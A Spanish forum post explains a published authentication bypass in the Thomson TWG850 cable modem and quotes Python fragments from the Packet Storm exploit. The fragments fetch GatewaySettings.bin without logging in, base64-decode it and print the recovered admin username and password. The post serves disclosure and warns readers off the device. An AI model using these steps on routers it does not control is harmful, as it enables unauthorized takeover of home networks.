[h]Obtener los credenciales de administrador de un Thomson TXG850 [/h]
https://www.wifi-libre.com/img/members/3/Thom1.jpg
Esto no es una lavadora: es un router.
Un router un “poco” anticuado con un diseño muy “Thomson” (ex-speedtouch, ahora Technicolor) .
¿Será por intentar hacer olvidar que crearon estos monstruos que esta empresa ha cambiado de nombre tantas veces?
Y tienen una brecha muy seria que permite a un intruso o a uno usuario no autorizado de hacerse con la contraseña root del dispositivo.
Podemos ver el “exploit” en este tema de packet storm :
[list=*]
]Thomsom Cable Modem TWG850-4B ST9C.05.08 Authentication Bypass/]
[/list]
Lo que ocurre es que los credenciales están
[list=1]
]en un fichero accesible sin conocer la contraseña root/]
]cifrados en base 64 y es una función de hash reversible/]
[/list]
1. Se pasa por CatewaySettings.bin : vemos la variable “bifi” definida aquí
bifi = 'GatewaySettings.bin'
Par ser empleada en la petición
req = urllib2.Request('%s/%s'%(router,bifi))
2. Aquí vemos como se hace el descifrado (base 64 ) con un bucle “for”
for s in hr_data(bifi):
try:
dec = base64.decodestring(s)
Y luego se pillan los datos con el “bucle if”
[code] if dec.find(‘:’) != -1:
user,passwd = dec.split(‘:’)
print ‘(+)- User: %s%s%s’%(G_C,user,D_C)
print ‘(+)- Pass: %s%s%s’%(G_C,passwd,D_C)
print '(+)- Checking if creds are OK...'
checkcreds(router,user,passwd)[/code]
No hay remedio y no habrán actualizaciones para este router.
No es aconsejable usarlo como router para su red domestica.
Los créditos para este full disclosure van a Glaysson dos Santos
Fuente:
[list=*]
]Thomsom Cable Modem TWG850-4B ST9C.05.08 Authentication Bypass @ Packetstorm/]
[/list]